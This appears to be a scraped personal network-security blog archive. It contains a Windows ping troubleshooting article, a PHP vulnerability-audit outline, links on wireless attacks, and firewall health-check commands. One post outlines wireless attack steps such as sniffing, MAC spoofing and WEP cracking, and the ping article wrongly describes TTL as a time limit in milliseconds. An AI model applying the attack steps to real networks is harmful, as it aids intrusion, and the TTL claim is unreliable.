Believe it or not, it is not uncommon for a ping to succeed, even though two machines are having trouble communicating with each other. If this happens, it means that the underlying network infrastructure is good, and that the machines are able to communicate at the TCP/IP level. Typically, this is good news, because it means that the problem that is occurring is not very serious.
If normal communications between two machines are failing, but the two machines can PING each other successfully (be sure to run the PING command from both machines), then there is something else that you can try. Rather than pinging the network host by IP address, try replacing the IP address with the host’s fully qualified domain name, as shown in Figure D.
Figure D: Try pinging the network host by its fully qualified domain name
If you are able to ping the machine by its IP address, but not by its fully qualified domain name, then you most likely have a DNS issue. The workstation may be configured to use the wrong DNS server, or the DNS server may not contain a host record for the machine that you are trying to ping.
If you look at Figure D, you can see that the machine’s IP address is listed just to the right of its fully qualified domain name. This proves that the machine was able to resolve the fully qualified domain name. Make sure that the IP address that the name was resolved to is correct. If you see a different IP address than the one that you expected, then you may have an incorrect DNS host record.
Conclusion
In this article, I have shown you some steps for testing basic connectivity between two machines. In the next article in the series, I will show you some more techniques that you can use in the troubleshooting process.
**************************************************
Published: Aug 14, 2008
Updated: Sep 26, 2008
Section: Articles & Tutorials :: Network Troubleshooting
Author: Brien M. Posey
Rating: 3.6/5 - 32 Votes
If you would like to read other parts to this article please go to:
Troubleshooting Connectivity Problems on Windows Networks (Part 2)
Troubleshooting Connectivity Problems on Windows Networks (Part 3)
Troubleshooting Connectivity Problems on Windows Networks (Part 4)
Troubleshooting Connectivity Problems on Windows Networks (Part 5)
http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part1.html
http://searchnetworking.techtarget.com/tip/0,289483,sid7_gci1355527_mem1,00.html
If you would like to be notified when Brien M. Posey releases the next part of this article series please sign up to the WindowsNetworking.com Real time article update newsletter.
Today’s network hardware and software is more reliable than ever but even so, things do occasionally go wrong. In this article series, I am going to discuss some troubleshooting techniques that you can use when a host on your Windows network has trouble communicating with other network hosts. For the sake of those with less experience in working with the TCP/IP protocol, I’m going to start with the basics, and then work toward the more advanced techniques.
Verify Network Connectivity
When one host has trouble communicating with another, the first thing that you must do is to gather some information about the problem. More specifically, you need to document the host’s configuration, find out if the host is having trouble communicating with any other machines on the network, and find out if the problem effects any other hosts.
For example, suppose that a workstation is having trouble communicating with a particular server. That in itself doesn’t really give you a lot to go on. However, if you were to dig a little bit deeper into the problem and found out that the workstation couldn’t communicate with any of the network servers, then you would know to check for a disconnected network cable, a bad switch port, or maybe a network configuration problem.
Likewise, if the workstation were able to communicate with some of the network servers, but not all of them, that too would give you a hint as to where to look for the problem. In that type of situation, you would probably want to check to see what the servers that could not be contacted had in common. Are they all on a common subnet? If so, then a routing problem is probably to blame.
If multiple workstations are having trouble communicating with a specific server, then the problem probably isn’t related to the workstations unless those workstations were recently reconfigured. More than likely, it is the server itself that is malfunctioning.
The point is that by starting out with a few basic tests, you can gain a lot of insight into the problem at hand. The tests that I am about to show you will rarely show you the cause of the problem, but they will help to narrow things down so that you will know where to begin the troubleshooting process.
PING
PING is probably the simplest TCP/IP diagnostic utility ever created, but the information that it can provide you with is invaluable. Simply put, PING tells you whether or not your workstation can communicate with another machine.
The first thing that I recommend doing is opening a Command Prompt window, and then entering the PING command, followed by the IP address of the machine that you are having trouble communicating with. When you do, the machine that you have specified should produce four replies, as shown in Figure A.
Figure A: The specified machine should generate four replies
The responses essentially tell you how long it took the specified machine to respond with thirty two bytes of data. For example, in Figure A, each of the four responses were received in less than four milliseconds.
Typically, when you issue the PING command, one of four things will happen, each of which has its own meaning.
The first thing that can happen is that the specified machine will produce four replies. This indicates that the workstation is able to communicate with the specified host at the TCP/IP level.
The second thing that can happen is that all four requests time out, as shown in Figure B. If you look at Figure A, you will notice that each response ends in TTL=128. TTL stands for Time To Live. What this means is that each of the four queries and responses must be completed within 128 milliseconds. The TTL is also decremented once for each hop on the way back. A hop occurs when a packet moves from one network to another. I will be talking a lot more about hops later on in this series.
Figure B: If all four requests time out, it could indicate a communications failure
At any rate, if all four requests have timed out, it means that the TTL expired before the reply was received. This can mean one of three things:
Communications problems are preventing packets from flowing between the two machines. This could be caused by a disconnected cable, a bad routing table, or a number of other issues.
Communications are occurring, but are too slow for PING to acknowledge. This can be caused by extreme network congestion, or by faulty network hardware or wiring.
Communications are functional, but a firewall is blocking ICMP traffic. PING will not work unless the destination machine’s firewall (and any firewalls between the two machines) allow ICMP echos.
A third thing that can happen when you enter the PING command is that some replies are received, while others time out. This can point to bad network cabling, faulty hardware, or extreme network congestion.
The fourth thing that can occur when pinging a host is that you receive an error similar to the one that is shown in Figure C.
Figure C: This type of error indicates that TCP/IP is not configured correctly
The PING: Transmit Failed error indicates that TCP/IP is not configured correctly on the machine on which you are trying to enter the PING command. This particular error is specific to Vista though. Older versions of Windows produce an error when TCP/IP is configured incorrectly, but the error message is “Destination Host Unreachable”
What if the PING is Successful?
Believe it or not, it is not uncommon for a ping to succeed, even though two machines are having trouble communicating with each other. If this happens, it means that the underlying network infrastructure is good, and that the machines are able to communicate at the TCP/IP level. Typically, this is good news, because it means that the problem that is occurring is not very serious.
If normal communications between two machines are failing, but the two machines can PING each other successfully (be sure to run the PING command from both machines), then there is something else that you can try. Rather than pinging the network host by IP address, try replacing the IP address with the host’s fully qualified domain name, as shown in Figure D.
Figure D: Try pinging the network host by its fully qualified domain name
If you are able to ping the machine by its IP address, but not by its fully qualified domain name, then you most likely have a DNS issue. The workstation may be configured to use the wrong DNS server, or the DNS server may not contain a host record for the machine that you are trying to ping.
If you look at Figure D, you can see that the machine’s IP address is listed just to the right of its fully qualified domain name. This proves that the machine was able to resolve the fully qualified domain name. Make sure that the IP address that the name was resolved to is correct. If you see a different IP address than the one that you expected, then you may have an incorrect DNS host record.
Conclusion
In this article, I have shown you some steps for testing basic connectivity between two machines. In the next article in the series, I will show you some more techniques that you can use in the troubleshooting process.
**************************************************
Published: Aug 14, 2008
Updated: Sep 26, 2008
Section: Articles & Tutorials :: Network Troubleshooting
Author: Brien M. Posey
Rating: 3.6/5 - 32 Votes
If you would like to read other parts to this article please go to:
Troubleshooting Connectivity Problems on Windows Networks (Part 2)
Troubleshooting Connectivity Problems on Windows Networks (Part 3)
Troubleshooting Connectivity Problems on Windows Networks (Part 4)
Troubleshooting Connectivity Problems on Windows Networks (Part 5)
http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part1.html
http://searchnetworking.techtarget.com/tip/0,289483,sid7_gci1355527_mem1,00.html
Saturday, April 25, 2009
20 ways to php Source code fuzzing (Auditing)
20 ways to php Source code fuzzing (Auditing)
Hello .
This article is only for who attend php as well and really knowing how to program In PHP.
When we talk about PHP Vulnerability discovery, we forget this Question:
What types of bugs?
When we can answer this Question, we will gain to find vulnerability as well as drink some water.
Reading in this article :
Section 1 : (20 ways to PHP source code Auditing - PHP Fuzzing)
1- Cross Site Scripting
2- SQL Injection [medium]
3- HTTP Response Splitting [Medium]
4- Dynamic Evaluation Vulnerabilities [High]
5- Process Control / PHP Code Injection (HIGH)
6- Local / Remote file inclusion (High)
7 – File Management (HIGH)
8- Buffer overflows (High, But Hard Usage)
9- Cookie / Session injection / Fixation / [High]
10 – Denial Of service [Medium, But Hard Assessment]:
11 - XPath Injection [XML Functions]
12 - Often Misused: File Uploads (High)
13 - Un-Authorize summon of Functionality / File (Medium)
14 - Authentication Bypass with Brute Force (Low)
15 - Insecure Randomness Session / Cookie / Backup files (Medium)
16 - Informative details in HTML Comments (Low)
17 - Default unnecessary installation files (medium)
18 – Regular Expression Vulnerability (High)
19 – Resource Injection (Medium)
20 – Week Password / Encryption: (Low)
Section 2:
Automatic PHP Auditor source code
This article is not a full reference about PHP source code security review (a.k.a auditing) but I tried to do this work in my short time as well. So please take my apology about all of mistakes (maybe) I made during completing this article. I’m not sure but maybe I’ve release future version of this article that contain a few more advanced methods.
Here is some of future talk and topics may I add this article in next version:
1- More Real world Attack with Description
2- PHPIDS Defense.
3- More Dangerous Functions: CURL – socket – creat_function & ….
4- Talk About pear functions and security of used.
5- Information About Books of PHP Securea Coding.
6- And ETC
Download :
php-fuzzing-auditing-version-1.0
thanks.
Daphne
http://abysssec.com/blog/2009/03/php_fuzz_audit/
Hello .
This article is only for who attend php as well and really knowing how to program In PHP.
When we talk about PHP Vulnerability discovery, we forget this Question:
What types of bugs?
When we can answer this Question, we will gain to find vulnerability as well as drink some water.
Reading in this article :
Section 1 : (20 ways to PHP source code Auditing - PHP Fuzzing)
1- Cross Site Scripting
2- SQL Injection [medium]
3- HTTP Response Splitting [Medium]
4- Dynamic Evaluation Vulnerabilities [High]
5- Process Control / PHP Code Injection (HIGH)
6- Local / Remote file inclusion (High)
7 – File Management (HIGH)
8- Buffer overflows (High, But Hard Usage)
9- Cookie / Session injection / Fixation / [High]
10 – Denial Of service [Medium, But Hard Assessment]:
11 - XPath Injection [XML Functions]
12 - Often Misused: File Uploads (High)
13 - Un-Authorize summon of Functionality / File (Medium)
14 - Authentication Bypass with Brute Force (Low)
15 - Insecure Randomness Session / Cookie / Backup files (Medium)
16 - Informative details in HTML Comments (Low)
17 - Default unnecessary installation files (medium)
18 – Regular Expression Vulnerability (High)
19 – Resource Injection (Medium)
20 – Week Password / Encryption: (Low)
Section 2:
Automatic PHP Auditor source code
This article is not a full reference about PHP source code security review (a.k.a auditing) but I tried to do this work in my short time as well. So please take my apology about all of mistakes (maybe) I made during completing this article. I’m not sure but maybe I’ve release future version of this article that contain a few more advanced methods.
Here is some of future talk and topics may I add this article in next version:
1- More Real world Attack with Description
2- PHPIDS Defense.
3- More Dangerous Functions: CURL – socket – creat_function & ….
4- Talk About pear functions and security of used.
5- Information About Books of PHP Securea Coding.
6- And ETC
Download :
php-fuzzing-auditing-version-1.0
thanks.
Daphne
http://abysssec.com/blog/2009/03/php_fuzz_audit/
Monday, April 20, 2009
Information Gathering
New School Information New School Information Gathering Gathering
http://www.toorcon.org/tcx/17_Gates.pdf
@
http://www.carnal0wnage.com/research/newschoolinfogathering-chicagocon.pdf
Information Gathering: The Complete Documentation
http://www.l0t3k.org/security/docs/gathering/
Passive Information Gathering Techniques
http://seclists.org/basics/2004/Feb/0073.html
http://www.toorcon.org/tcx/17_Gates.pdf
@
http://www.carnal0wnage.com/research/newschoolinfogathering-chicagocon.pdf
Information Gathering: The Complete Documentation
http://www.l0t3k.org/security/docs/gathering/
Passive Information Gathering Techniques
http://seclists.org/basics/2004/Feb/0073.html
Sunday, April 19, 2009
Caffe Latte attack
http://www.security-freak.net/toorcon/cafe-latte-wireless-attack.html
The Caffe Latte Attack: How It Works—and How to Block It
By Lisa Phifer
December 12, 2007
http://www.wi-fiplanet.com/tutorials/article.php/3716241
http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2
Saturday, April 18, 2009
Wireless Attacks and Penetration Testing
Wireless Attacks and Penetration Testing (part 1 of 3)
Jonathan Hassell 2004-06-03
http://www.securityfocus.com/infocus/1783
Wireless Attacks and Penetration Testing (part 2 of 3)
Jonathan Hassell 2004-06-14
http://www.securityfocus.com/infocus/1785
Wireless Attacks and Penetration Testing (part 3 of 3)
Jonathan Hassell 2004-07-26
http://www.securityfocus.com/infocus/1792
Figure 1: Sniffing packets with AirSnort
Jonathan Hassell 2004-06-03
http://www.securityfocus.com/infocus/1783
Wireless Attacks and Penetration Testing (part 2 of 3)
Jonathan Hassell 2004-06-14
http://www.securityfocus.com/infocus/1785
Wireless Attacks and Penetration Testing (part 3 of 3)
Jonathan Hassell 2004-07-26
http://www.securityfocus.com/infocus/1792
Figure 1: Sniffing packets with AirSnort
Saturday, March 28, 2009
Checkpoint Firewall - IPSO Standard Health Check
GUI = Smart View Monitor
CLI as below
cphaprob stat
to check the HA state
For Nokia Box, run
CLI as below
fw stat
cpstat fw
cphaprob stat
to check the HA state
For Nokia Box, run
clish
show vrrp
Friday, March 27, 2009
Checkpoint Firewall - Fw Monitor
[PDF]
How to use fw monitor
http://www.checkpoint.com/techsupport/downloads/html/ethereal/fw_monitor_rev1_01.pdf
[DOC]
FW MONITOR
www.cpug.org/check_point_resources/FW%20MONITOR_expert.doc
[PDF]
Fw Monitor
www.nokia.com/NOKIA_COM_1/About_Nokia/Press/White_Papers/pdf_files/technicalwhitepaper_fwmonitoring.pdf
How to use fw monitor
http://www.checkpoint.com/techsupport/downloads/html/ethereal/fw_monitor_rev1_01.pdf
[DOC]
FW MONITOR
www.cpug.org/check_point_resources/FW%20MONITOR_expert.doc
[PDF]
Fw Monitor
www.nokia.com/NOKIA_COM_1/About_Nokia/Press/White_Papers/pdf_files/technicalwhitepaper_fwmonitoring.pdf
grep pix log
cat pix.log | grep "Sep 26 20:" | grep -v Teardown | grep -v Built| grep -v Deny | grep -v Accessed| grep -v access-list | grep -v Inbound | grep -v Deny | grep -v Accessed| grep -v access-list | grep "PIX-1-"
Thursday, March 26, 2009
Cisco Pix Firewall - Standard Health Check
1.
- bila tarikh last failover
- cek status sume fw interface
2.
3.
4.
5.
6.
sh fail- untuk cek yg mana primary atau secondary yg tengah active atau standby
- bila tarikh last failover
- cek status sume fw interface
2.
sh conn count- cek bape byk bilangan connection, kalau banyak betulla tu fw tengah pass traffic
3.
sh conn- nak tengok connection
4.
sh mem- cek fw memory
5.
sh cpu usage- cek fw cpu utilization
6.
sh int- cek sume interface kat fw
Saturday, March 7, 2009
Saturday, February 14, 2009
One of my student just copy paste everything from here for their wireless assignment.. got u! :P
http://technet.microsoft.com/en-us/library/bb457019.aspx
http://technet.microsoft.com/en-us/library/bb457019.aspx
2.4GHz vs. 5GHz Deployment Considerations
When deploying a wireless LAN, companies must make a decision on whether to use network interface cards (NICs) and access points designed to operate in the 2.4GHz or 5GHz band (or both). Not too long ago the choice of frequency band was easy, when only 2.4GHz (i.e., 802.11b) products were available. Now, 802.11b and 802.11g products are both available that operate in the 2.4GHz band, while 802.11a use the 5GHz band. This can cause confusion when designing a WLAN, so let's take a look at what you need to consider when making this critical resolution.
http://www.wi-fiplanet.com/tutorials/article.php/1569271
http://www.wi-fiplanet.com/tutorials/article.php/1569271
Sunday, February 8, 2009
Wireless threats, vulnerabilities and solution
Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-
1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.
2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.
3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.
4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.
5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.
6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning
7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.
8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).
9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.
10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.
11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.
12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.
13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.
14) Wireless Network Probing :- The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.
15) AP Weaknesses :- APs have weaknesses that are both due to design mistakes and user interfaces
16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.
17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.
18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.
19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.
| | Tips for Wireless Home Network Security | |
1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely
List of Wireless Certification
CISCO
http://www.cisco.com/web/learning/le3/learning_career_certifications_and_learning_paths_home.html
1. CCNA Wireless Certification
The Cisco CCIE Wireless certification assesses and validates wireless expertise. Candidates who pass the CCIE Wireless certification exams demonstrate broad theoretical knowledge of wireless networking and a solid understanding of wireless local area networking (WLAN) technologies from Cisco, the market leader in WLAN technology.
http://www.cisco.com/web/learning/le3/ccie/wireless/index.html
Cisco Advanced Wireless LAN Design Specialist
Tuesday, February 3, 2009
Cisco PIX Firewall System Log Messages - End Configuration Replication
Log Message %PIX-1-709004: (Primary) End Configuration Replication (ACT)
Explanation This is a failover message. This message is logged when the Active unit completes replicating its configuration on the Standby unit. "(Primary)" can be either Primary or Secondary.
Recommended Action None required.
Log Message %PIX-1-709006: (Primary) End Configuration Replication (STB)
Explanation This is a failover message. This message is logged when the Standby unit completes replicating a configuration sent by the Active unit. "(Primary)" can be either Primary or Secondary.
Recommended Action None required.
http://www.cisco.com/en/US/docs/security/pix/pix44/system/message/pixemsgs.html
Explanation This is a failover message. This message is logged when the Active unit completes replicating its configuration on the Standby unit. "(Primary)" can be either Primary or Secondary.
Recommended Action None required.
Log Message %PIX-1-709006: (Primary) End Configuration Replication (STB)
Explanation This is a failover message. This message is logged when the Standby unit completes replicating a configuration sent by the Active unit. "(Primary)" can be either Primary or Secondary.
Recommended Action None required.
http://www.cisco.com/en/US/docs/security/pix/pix44/system/message/pixemsgs.html
Monday, February 2, 2009
10 Tips for Wireless Home Network Security / 10 Tips Keselamatan Tanpa Wayar
Many folks setting up wireless home networks rush through the job to
get their Internet connectivity working as quickly as possible. That's
totally understandable. It's also quite risky as numerous security
problems can result. Today's Wi-Fi networking products don't always
help the situation as configuring their security features can be time-
consuming and non-intuitive. The recommendations below summarize the
steps you should take to improve the security of your home wireless
network.
get their Internet connectivity working as quickly as possible. That's
totally understandable. It's also quite risky as numerous security
problems can result. Today's Wi-Fi networking products don't always
help the situation as configuring their security features can be time-
consuming and non-intuitive. The recommendations below summarize the
steps you should take to improve the security of your home wireless
network.
1. Change Default Administrator Passwords (and Usernames)
At the core of most Wi-Fi home networks is an access point or router.
To set up these pieces of equipment, manufacturers provide Web pages
that allow owners to enter their network address and account
information. These Web tools are protected with a login screen
(username and password) so that only the rightful owner can do this.
However, for any given piece of equipment, the logins provided are
simple and very well-known to hackers on the Internet. Change these
settings immediately.
2. Turn on (Compatible) WPA / WEP Encryption
All Wi-Fi equipment supports some form of encryption. Encryption
technology scrambles messages sent over wireless networks so that they
cannot be easily read by humans. Several encryption technologies exist
for Wi-Fi today. Naturally you will want to pick the strongest form of
encryption that works with your wireless network. However, the way
these technologies work, all Wi-Fi devices on your network must share
the identical encryption settings. Therefore you may need to find a
"lowest common demoninator" setting.
3. Change the Default SSID
Access points and routers all use a network name called the SSID.
Manufacturers normally ship their products with the same SSID set. For
example, the SSID for Linksys devices is normally "linksys." True,
knowing the SSID does not by itself allow your neighbors to break into
your network, but it is a start. More importantly, when someone finds
a default SSID, they see it is a poorly configured network and are
much more likely to attack it. Change the default SSID immediately
when configuring wireless security on your network.
4. Enable MAC Address Filtering
Each piece of Wi-Fi gear possesses a unique identifier called the
physical address or MAC address. Access points and routers keep track
of the MAC addresses of all devices that connect to them. Many such
products offer the owner an option to key in the MAC addresses of
their home equipment, that restricts the network to only allow
connections from those devices. Do this, but also know that the
feature is not so powerful as it may seem. Hackers and their software
programs can fake MAC addresses easily.
5. Disable SSID Broadcast
In Wi-Fi networking, the wireless access point or router typically
broadcasts the network name (SSID) over the air at regular intervals.
This feature was designed for businesses and mobile hotspots where Wi-
Fi clients may roam in and out of range. In the home, this roaming
feature is unnecessary, and it increases the likelihood someone will
try to log in to your home network. Fortunately, most Wi-Fi access
points allow the SSID broadcast feature to be disabled by the network
administrator.
6. Do Not Auto-Connect to Open Wi-Fi Networks
Connecting to an open Wi-Fi network such as a free wireless hotspot or
your neighbor's router exposes your computer to security risks.
Although not normally enabled, most computers have a setting available
allowing these connections to happen automatically without notifying
you (the user). This setting should not be enabled except in temporary
situations.
7. Assign Static IP Addresses to Devices
Most home networkers gravitate toward using dynamic IP addresses. DHCP
technology is indeed easy to set up. Unfortunately, this convenience
also works to the advantage of network attackers, who can easily
obtain valid IP addresses from your network's DHCP pool. Turn off DHCP
on the router or access point, set a fixed IP address range instead,
then configure each connected device to match. Use a private IP
address range (like 10.0.0.x) to prevent computers from being directly
reached from the Internet.
8. Enable Firewalls On Each Computer and the Router
Modern network routers contain built-in firewall capability, but the
option also exists to disable them. Ensure that your router's firewall
is turned on. For extra protection, consider installing and running
personal firewall software on each computer connected to the router.
9. Position the Router or Access Point Safely
Wi-Fi signals normally reach to the exterior of a home. A small amount
of signal leakage outdoors is not a problem, but the further this
signal reaches, the easier it is for others to detect and exploit. Wi-
Fi signals often reach through neighboring homes and into streets, for
example. When installing a wireless home network, the position of the
access point or router determines its reach. Try to position these
devices near the center of the home rather than near windows to
minimize leakage.
10. Turn Off the Network During Extended Periods of Non-Use
The ultimate in wireless security measures, shutting down your network
will most certainly prevent outside hackers from breaking in! While
impractical to turn off and on the devices frequently, at least
consider doing so during travel or extended periods offline. Computer
disk drives have been known to suffer from power cycle wear-and-tear,
but this is a secondary concern for broadband modems and routers.
If you own a wireless router but are only using it wired (Ethernet)
connections, you can also sometimes turn off Wi-Fi on a broadband
router without powering down the entire network.
More Info
http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm
Subscribe to:
Posts (Atom)
LinkWithin
